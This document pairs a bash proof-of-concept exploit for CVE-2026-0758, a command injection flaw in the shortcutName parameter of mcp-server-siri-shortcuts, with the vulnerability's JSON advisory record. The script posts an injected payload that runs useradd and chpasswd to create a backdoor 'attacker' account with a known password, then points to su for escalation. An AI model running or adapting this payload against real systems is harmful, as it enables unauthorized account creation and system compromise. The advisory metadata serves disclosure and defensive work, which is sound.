CVE-2026-0758

#!/bin/bash # CVE-2026-0758 PoC - Command Injection in shortcutName parameter # This PoC demonstrates the command injection vulnerability in mcp-server-siri-shortcuts # Target: mcp-server-siri-shortcuts service TARGET_HOST="localhost" TARGET_PORT="8080" # Malicious payload - injects command to create a backdoor user # The shortcutName parameter is vulnerable to command injection PAYLOAD="test'; useradd -m -s /bin/bash attacker; echo 'attacker:password' | chpasswd; #" # Send malicious request to trigger command injection echo "Sending exploit payload..." curl -X POST "http://${TARGET_HOST}:${TARGET_PORT}/api/shortcuts" \ -H "Content-Type: application/json" \ -d "{\"shortcutName\": \"${PAYLOAD}\", \"action\": \"execute\"}" echo "" echo "If exploitation successful, a new user 'attacker' has been created." echo "Attacker can now escalate privileges using: su - attacker"

{"cve": {"id": "CVE-2026-0758", "sourceIdentifier": "[email protected]", "published": "2026-01-23T04:16:02.433", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "mcp-server-siri-shortcuts shortcutName Command Injection Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of mcp-server-siri-shortcuts. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the shortcutName parameter. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the service account. Was ZDI-CAN-27910."}, {"lang": "es", "value": "Vulnerabilidad de inyección de comandos y escalada de privilegios shortcutName en mcp-server-siri-shortcuts. Esta vulnerabilidad permite a atacantes locales escalar privilegios en instalaciones afectadas de mcp-server-siri-shortcuts. Un atacante debe primero obtener la capacidad de ejecutar código con privilegios bajos en el sistema objetivo para explotar esta vulnerabilidad.\n\nLa falla específica existe dentro del parámetro shortcutName. El problema resulta de la falta de validación adecuada de una cadena proporcionada por el usuario antes de usarla para ejecutar una llamada al sistema. Un atacante puede aprovechar esta vulnerabilidad para escalar privilegios y ejecutar código arbitrario en el contexto de la cuenta de servicio. Fue ZDI-CAN-27910."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-024/", "source": "[email protected]"}]}}